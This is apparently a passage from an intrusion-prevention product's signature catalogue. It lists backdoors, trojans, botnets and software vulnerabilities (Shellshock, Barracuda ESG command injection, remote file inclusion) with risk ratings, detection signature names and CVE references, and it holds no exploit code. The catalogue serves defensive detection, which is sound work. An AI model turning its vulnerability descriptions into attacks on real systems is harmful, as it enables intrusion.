
Backdoor-Ruler

About this vulnerability: Ruler backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ruler
Type: Backdoor
Description: Ruler is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Ruler-Response
Back to top

Backdoor-Satans

About this vulnerability: Satans backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows NT
Software: Satans
Type: Backdoor
Description: Satans backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Satans-Response
Back to top

Backdoor-Scarab

About this vulnerability: Scarab backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Scarab
Type: Backdoor
Description: Scarab is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Scarab-Response
Back to top

Backdoor-Schneckenkorn

About this vulnerability: Schneckenkorn backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneckenkorn
Type: Backdoor
Description: Schneckenkorn is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Schneckenkorn-Response
Back to top

Backdoor-Script-Serv-U-FTP-User-CVE-2021-35211

About this vulnerability: An attempt to execute a backdoor of CVE-2021-35211 detected
Risk: High
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: An attempt to execute a backdoor of CVE-2021-35211 detected
Situation: File-Text_Backdoor-Script-Serv-U-FTP-User-CVE-2021-35211
References:
CVE-2021-35211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211
Back to top

Backdoor-Tcc-Trojan

About this vulnerability: Tcc Trojan backdoor
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Tcc is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Tcc-Trojan-Request
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-The-Prayer

About this vulnerability: The Prayer backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: The Prayer
Type: Backdoor
Description: The Prayer backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_The-Prayer-Response
Back to top

Backdoor-The-Thing

About this vulnerability: The Thing backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: The Thing
Type: Backdoor
Description: The Thing is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: X11_ThetHing-Backdoor-Banner
X11_ThetHing-Backdoor-Connected
BD-TCP_The-Thing-Response
Back to top

Backdoor-The-Unexplained

About this vulnerability: The Unexplained backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows NT
Software: The Unexplained
Type: Backdoor
Description: The Unexplained backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-UDP_The-Unexplained-Response
Back to top

Backdoor-Total-Solar-Eclypse

About this vulnerability: Backdoor Total Solar Eclypse activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98
Software: Total Solar Eclypse
Type: Backdoor
Description: The Total Solar Eclypse backdoor allows a remote attacker to upload files to an infected system by using a built-in FTP server.
Situation: BD-TCP_Total-Solar-Eclypse-Response
Back to top

Backdoor-TransScout

About this vulnerability: TransScout backdoor
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: TransScout is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_TransScout-Request
BD-TCP_RUX-The-Tick
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Trojan-Cow

About this vulnerability: Trojan Cow backdoor
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Cow is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Cow-Trojan-Request
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Tron

About this vulnerability: Tron backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Tron
Type: Backdoor
Description: Tron is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Tron-Response
Back to top

Backdoor-Truva

About this vulnerability: Truva backdoor
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Truva is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: Telnet_Truva-Response
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Ullysse

About this vulnerability: Ullysse backdoor
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Ullysse is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Ullysse-Request
Back to top

Backdoor-UltimateRAT

About this vulnerability: UltimateRAT backdoor
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: UltimateRAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_UltimateRAT-Request
Back to top

Backdoor-Ultors

About this vulnerability: Ultors backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98
Software: Ultors
Type: Backdoor
Description: Ultors backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Ultors-Response
Back to top

Backdoor-Undetected

About this vulnerability: Undetected backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Undetected
Type: Backdoor
Description: Undetected is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Undetected-Response
Back to top

Backdoor-Vagr-Nocker

About this vulnerability: Vagr Nocker backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Vagr Nocker
Type: Backdoor
Description: Vagr Nocker is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Vagr-Nocker-Response
Back to top

Backdoor-ValV-N.E.T

About this vulnerability: Voodoo Doll backdoor
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: ValV-N.E.t 2.0b1 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program. ValV-N.E.t 2.0b1 is similar to NetBus as it is an old NetBus clone. The server and client are simply modifed versions of NetBus.
Situation: BD-TCP_ValV-N.E.T-Request
BD-TCP_Uploader-Request
Back to top

Backdoor-Vampire

About this vulnerability: Vampire backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Vampire
Type: Backdoor
Description: Vampire is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Vampire-Response
Back to top

Backdoor-Voodoo-Doll

About this vulnerability: Voodoo Doll backdoor
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Voodoo Doll is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Voodoo-Doll-Backdoor
Back to top

Backdoor-War-Trojan

About this vulnerability: War Trojan backdoor
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: WarTrojan is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_War-Trojan
Back to top

Backdoor-Win-Mite-1

About this vulnerability: Backdoor Windows Mite 1.0
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Mite
Type: Backdoor
Description: Windows Mite 1.0 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Win-Mite-1.0-Reply
Back to top

Backdoor-WinCrash-1-03

About this vulnerability: Backdoor WinCrash 1.03
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinCrash
Type: Backdoor
Description: WinCrash is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_WinCrash-1.03-Capslock
BD-TCP_WinCrash-1.03-Banner
Back to top

Backdoor-WinCrash-2-0

About this vulnerability: Backdoor WinCrash 2.0
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinCrash
Type: Backdoor
Description: WinCrash is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_WinCrash-2.0-Connect
BD-TCP_WinCrash-2.0-Banner
Back to top

Backdoor-WinRAT-1

About this vulnerability: Backdoor WinRAT 1.0
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinRAT
Type: Backdoor
Description: WinRAT 1.0 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_WinRAT-1.0-Client-Connect
Back to top

Backdoor-WinRAT-1-2

About this vulnerability: Backdoor WinRAT 1.2
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinRAT
Type: Backdoor
Description: WinRAT 1.2 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_WinRAT-1.2-Client-Connect
BD-TCP_WinRAT-1.2-Taskbar
BD-TCP_WinRAT-1.2-Taskbar-Reply
Back to top

Backdoor-Wow23-03

About this vulnerability: Backdoor Wow23 0.3
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Wow23
Type: Backdoor
Description: Wow23 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: HTTP_BD-Wow32-Banner
HTTP_CS-BD-Wow32-Connect
HTTP_SHS-BD-Wow32-Banner
Back to top

Backdoor-Xanadu-1-0

About this vulnerability: Backdoor Xanadu 1.0
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Xanadu
Type: Backdoor
Description: Xanadu is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-UDP_Xanadu-1.0-Request
BD-UDP_Xanadu-1.0-Reply
Back to top

Backdoor-Xanadu-1-11

About this vulnerability: Backdoor Xanadu 1.11
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Xanadu
Type: Backdoor
Description: Xanadu is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Xanadu-1.11-Client-Connect
Back to top

Backdoor-XLog-2-2

About this vulnerability: Xlog backdoor
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: XLog
Type: Backdoor
Description: Xlog is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program. This Xlog trojan is not related to the X11 Window system.
Situation: BD-TCP_XLog-2.2-Connect
BD-TCP_Backdoor-XLog-2.2-Banner-1
Back to top

Backdoor-Y3K-RAT-1-1

About this vulnerability: Backdooor Y3K RAT 1.1
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Y3K RAT
Type: Backdoor
Description: Y3K RAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-UDP_Y3K-RAT-1.1-Ping
BD-UDP_Y3K-RAT-1.1-Confirm
Back to top

Backdoor-Y3K-RAT-1-4

About this vulnerability: Backdoor Y3K RAT 1.4
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Y3K RAT
Type: Backdoor
Description: Y3K RAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Y3K-RAT-1.4-Server-Banner-Detected
BD-UDP_Y3K-RAT-1.4-Ping
Back to top

Backdoor-Y3K-RAT-1-6

About this vulnerability: Backdoor Y3K RAT 1.6
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Y3K RAT
Type: Backdoor
Description: Y3K RAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Y3K-RAT-1.6-Server-Banner-Detected
Back to top

Backdoor-YAT-2-1

About this vulnerability: Backdoor YAT 2.1
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: YAT
Type: Backdoor
Description: YAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_YAT-2.1-Server-Banner-Detected
Back to top

Backdoor-YAT-3-01

About this vulnerability: Backdoor YAT 3.01
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: YAT
Type: Backdoor
Description: YAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_YAT-3.01-Startup-Command-Detected
BD-TCP_YAT-3.01-Server-Banner-Detected
BD-TCP_YAT-3.01-Startup-Command-Response
Back to top

BACnet-OPC-Client-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in BACnet OPC Client
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BACnet OPC Client
Type: Malfunction
Description: There is a buffer overflow vulnerability in the WTclient.dll ActiveX control of SCADA Engine BACnet OPC Client which may allow remote attackers to execute arbitrary code via a long string parameter.
Situation: File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerability-2
File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerabilities
References:
CVE-2010-4740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4740
BID-43289
http://www.securityfocus.com/bid/43289
Back to top

Badbox-Botnet-C2-Traffic

About this vulnerability: BADBOX Botnet activity detected
Risk: High
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: BadBox Botnet
Type: Backdoor
Description: BadBox is a mobile malware, which is likely to be based on the "Triada" malware family. It is infecting mobile devices either through supply chain attacks on their firmware, shady employees, or through injections taking place as they enter the product distribution phase. The goal of the malware is to turn the device into a residential proxy or using it to perform ad fraud.
Situation: HTTP_CSH-Badbox-Botnet-C2-Traffic
Back to top

Bagle-Spambot

About this vulnerability: Bagle spambot acts as a proxy to relay spam messages
Risk: High
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Bagle spambot
Type: Backdoor
Description: Bagle spambot acts as a proxy to relay spam messages.
Situation: HTTP_CRL-Bagle-Spambot
Back to top

Baidu-Soba-Search-Bar-File-Download-And-Execute

About this vulnerability: Arbitary file download and execute vulnerability in Baidu Soba Search Bar
Risk: High
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Baidu Soba Search Bar
Type: Malfunction
Description: There is an arbitrary file download and execute vulnerability in Baidu Soba Search Bar. The vulnerability allows arbitrary files to be downloaded and executed in the context of the current user.
Situation: HTTP_SS-Baidu-Soba-Search-Bar-File-Download-And-Execute
File-Text_Baidu-Soba-Search-Bar-File-Download-And-Execute
References:
CVE-2007-4105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105
BID-25121
http://www.securityfocus.com/bid/25121
Back to top

BakBone-NetVault-Heap-BOF

About this vulnerability: BakBone NetVault Heap Buffer Overflow Vulnerability
Risk: High
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BakBone NetVault
Type: Buffer Overflow
Description: BakBone NetVault suffers from a heap buffer overflow vulnerability, which could allow the attacker to compromise the server.
Situation: Generic_BakBone-NetVault-Heap-BOF
References:
CVE-2005-1009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1009
BID-12967
http://www.securityfocus.com/bid/12967
Back to top

BakBone-NetVault-Heap-BOF-2

About this vulnerability: BakBone NetVault Heap Buffer Overflow Vulnerability
Risk: High
First detected in: sgpkg-ips-164-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BakBone NetVault
Type: Buffer Overflow
Description: BakBone NetVault suffers from a heap buffer overflow vulnerability, which could allow the attacker to compromise the server.
Situation: Generic_BakBone-NetVault-Heap-BOF-2
References:
CVE-2005-1547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1547
Back to top

Baldr-Botnet-Panel-Shell-Upload-Exploit

About this vulnerability: A vulnerability in Baldr stealer malware control panel.
Risk: High
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Platform: Generic
Software: Baldr stealer malware
Type: Insecure Configuration
Description: A vulnerability in the Baldr stealer malware control panel which allows remote attackers to upload PHP files in zip format in place of log file uploads.
Situation: HTTP_CS-Baldr-Botnet-Panel-Shell-Upload-Exploit
Back to top

Bankpatch-Trojan-Request

About this vulnerability: Request generated by W32/Bankpatch trojna
Risk: High
First detected in: sgpkg-ips-204-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: The W32/Bankpatch reports its status to a set of generated domains after it has infected a host. Presence of these requests indicate that there are infected systems in the network.
Situation: HTTP_CS-Bankpatch-Trojan-Request
Back to top

BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this vulnerability: A vulnerability in BaoFeng Storm
Risk: High
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BaoFeng Storm
Type: Buffer Overflow
Description: There are multiple buffer overflows in the BaoFeng Strom media player ActiveX component. The vulnerability allows arbitrary code execution in the context of the current user.
Situation: HTTP_SS-BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
HTTP_SS-BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow-2
File-Text_BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
File-Text_BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow-2
References:
CVE-2007-4816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816
BID-25601
http://www.securityfocus.com/bid/25601
OSVDB-40491
http://www.osvdb.org/40491
Back to top

Barco-WePresent-File_transfer.cgi-Command-Injection

About this vulnerability: A vulnerability in Barco WePresent
Risk: High
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: Barco WePresent
Type: Input Validation
Description: There exists a vulnerability in multiple firmware versions of Barco WePresent routers which allows remote attackers to exexute arbitrary code due to the insufficient validation of user input to file_transfer.cgi.
Situation: HTTP_CRL-Barco-WePresent-File_transfer.cgi-Command-Injection
References:
CVE-2019-3929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3929
Back to top

Bargain-Buddy

About this vulnerability: Bargain Buddy
Risk: Low
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Bargain Buddy
Type: Misconfiguration
Description: Bargain Buddy is a windows program that adds itself as plugins to browsers. It may show advertisements and may be considered unwanted software by some organizations.
Situation: HTTP_CSU-Bargain-Buddy-Traffic
HTTP_CSH-CashBack-Buddy-Activity
HTTP_CSH-Bargain-Buddy-Install
HTTP_CSH-Bargain-Buddy-Traffic
Back to top

Barracuda-ESG-Archive-Name-Validation-Vulnerability-CVE-2023-2868

About this vulnerability: An attempt to exploit a vulnerability in Barracuda Email Security Gateway detected
Risk: High
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Barracuda Email Security Gateway
Type: Input Validation
Description: A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). It stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product.
Situation: File-Binary_Suspicious-Long-Name-In-Gnu-Tar-Archive
References:
CVE-2023-2868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2868
Back to top

Barracuda-ESG-Parameter-Injection-CVE-2023-7102

About this vulnerability: An attempt to exploit a vulnerability in Barracuda ESG detected
Risk: High
First detected in: sgpkg-ips-1670-5242
Last changed: sgpkg-ips-1670-5242
Platform: Generic
Software: Barracuda ESG
Type: Input Validation
Description: The issue is related to the third-party library named Spreadsheet::ParseExcel, which is used by the Amavis scanner within the Barracuda Email Security Gateway to screen Microsoft Excel email attachments for malware. The library is vulnerable to an arbitrary code execution, allowing parameter injection attacks to Barracuda ESG appliances.
Situation: File-OLE_Barracuda-ESG-Parameter-Injection-CVE-2023-7102
File-TextId_Barracuda-ESG-Parameter-Injection-CVE-2023-7102
References:
CVE-2023-7102
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7102
Back to top

Bash-Shellshock-Code-Injection

About this vulnerability: A vulnerability in Bourne Again Shell (bash)
Risk: High
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: bash
Type: Input Validation
Description: There is a code injection vulnerbility in Bourne Again Shell (bash), widely used command interpreter. The vulnerability allows an attacker to execute arbitrary code in the affected system if the system passes a crafted user provided input to the command shell.
Situation: Generic_UDP-Bash-Shellshock-Code-Injection
HTTP_CSU-Bash-Shellshock-Code-Injection
HTTP_CSH-Bash-Shellshock-Code-Injection
HTTP_CRL-Bash-Shellshock-Code-Injection
SMTP_Bash-Shellshock-Code-Injection
E-Mail_HCS-Bash-Shellshock-Code-Injection
FTP_CS-Bash-Shellshock-Code-Injection-2
FTP_CS-Bash-Shellshock-Code-Injection
BOOTP_CS-Bash-Shellshock-Code-Injection
References:
CVE-2014-6271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
OSVDB-112004
http://www.osvdb.org/112004
Back to top

Basic-Analysis-And-Security-Engine-File-Include

About this vulnerability: A Basic Analysis And Security Engine File Include vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Basic Analysis and Security Engine
Type: Input Validation
Description: A vulnerability in Basic Analysis and Security Engine, versions 1.2.4 and before, which allows remote attackers to execute arbitrary PHP code via a URL in the BASE_path parameter to base_qry_common.php, base_stat_common.php, and includes/base_include.inc.php.
Situation: HTTP_CSU_Basic-Analysis-And-Security-Engine-File-Include
References:
CVE-2006-2685
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2685
BID-18298
http://www.securityfocus.com/bid/18298
OSVDB-49366
http://www.osvdb.org/49366
Back to top

Bazar-Loader-Backdoor-Malware-Infection-Traffic

About this vulnerability: Bazar Loader or Bazar Backdoor malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1318-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Bazar Loader or Bazar Backdoor malware infection traffic was detected.
Situation: HTTP_CSU-Bazar-Backdoor-Malware-Infection-Traffic
HTTP_CSH-Bazar-Loader-Backdoor-Malware-Infection-Traffic
Back to top

Bbcode-e107-Remote-Code-Execution-Vulnerability

About this vulnerability: Arbitrary remote php code execution vulnerability in e107
Risk: High
First detected in: sgpkg-ips-336-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: e107
Type: Input Validation
Description: There is a vulnerability in bbcode/php.bb in e107 0.7.20. The vulnerability is due to an insufficient input validation, leading to execution of arbitary code in the context of the web server.
Situation: HTTP_CRL-e107-Contact-Php-Remote-Code-Execution
HTTP_CRL-e107-Contact-Php-Remote-Code-Execution-2
References:
CVE-2010-2099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2099
BID-40252
http://www.securityfocus.com/bid/40252
Back to top

BBShop-Remote-File-Inclusion

About this vulnerability: Remote file inclusion Vulnerability in BBShop
Risk: High
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BBShop
Type: Input Validation
Description: There is a remote file inclusion vulnerability in BBShop web shop application written in PHP scripting language. The application does not validate parameters correctly, allowing injection and execution of arbitary code into the context of the web server.
Situation: HTTP_CSU-BBShop-Remote-File-Inclusion
Back to top

Bea-WebLogic-SSL-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in BEA Systems WebLogic
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BEA WebLogic
Type: Malfunction
Description: There is a vulnerability in the way BEA System's WebLogic products handle SSL connections. An attacker can use this vulnerability to exhaust all available sockets, causing a Denial of Service condition. The attack target does not completely close an SSL connection and free its associated objects because the close process is interrupted by the exception triggered by the attacker's disconnect. When repeated multiple times, this eventually will cause the server to be unable to receive any new SSL requests, due to socket exhaustion, as well as resulting in a small memory leak. This will eventually result in a denial of service condition. Note: During testing, we were unable to exhaust all available sockets. However, the server did eventually crash due to memory exhaustion, as a result of the memory leak.
Situation: Generic_CS-Bea-WebLogic-SSL-Handling-Denial-Of-Service
TLS_CS-Bea-WebLogic-SSL-Handling-Denial-Of-Service
References:
CVE-2004-2424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2424
BID-10544
http://www.securityfocus.com/bid/10544
OSVDB-7076
http://www.osvdb.org/7076
Back to top

Beacon-Remote-File-Inclusion

About this vulnerability: Remote file inclusion Vulnerability in Beacon
Risk: High
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Beacon
Type: Input Validation
Description: There is a remote file inclusion vulnerability in Beacon content publishing system written in PHP scripting language. Particular script included within Beacon does not validate its parameters correctly, allowing injection and execution of arbitary code into the context of the web server.
Situation: HTTP_CSU-Beacon-Remote-File-Inclusion
References:
CVE-2007-2663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2663
BID-23959
http://www.securityfocus.com/bid/23959
OSVDB-37816
http://www.osvdb.org/37816
Back to top

Beck-Gmbh-IPC@CHIP-Conf-File-Discosure

About this vulnerability: Beck Gmbh IPC@CHIP allows php.ini file (containing passwords) reading in unauth manner.
Risk: High
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Beck GmbH IPC@CHIP
Type: Malfunction
Description: A vulnerability in Beck IPC GmbH IPC@CHIP Embedded-Webserver which allows remote attackers to read files via a webserver root directory set to system root, disclosing passwords.
Situation: HTTP_CSU-Beck-Gmbh-IPC@CHIP-Conf-File-Discosure
References:
CVE-2001-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0749
BID-2775
http://www.securityfocus.com/bid/2775
Back to top

Beck-Gmbh-IPC@CHIP-Denial-of-Service

About this vulnerability: Beck Gmbh IPC@CHIP Denial of Service.
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Beck GmbH IPC@CHIP
Type: Malfunction
Description: A vulnerability in Beck Gmbh IPC@Chip that allows a remote attacker to crash the service by sending the specially crafted tcp packet.
Situation: HTTP_CSU-Beck-Gmbh-IPC@CHIP-Denial-of-Service
Back to top

Beck-Gmdg-IPC@CHIP-Configuration-File-Disclosure

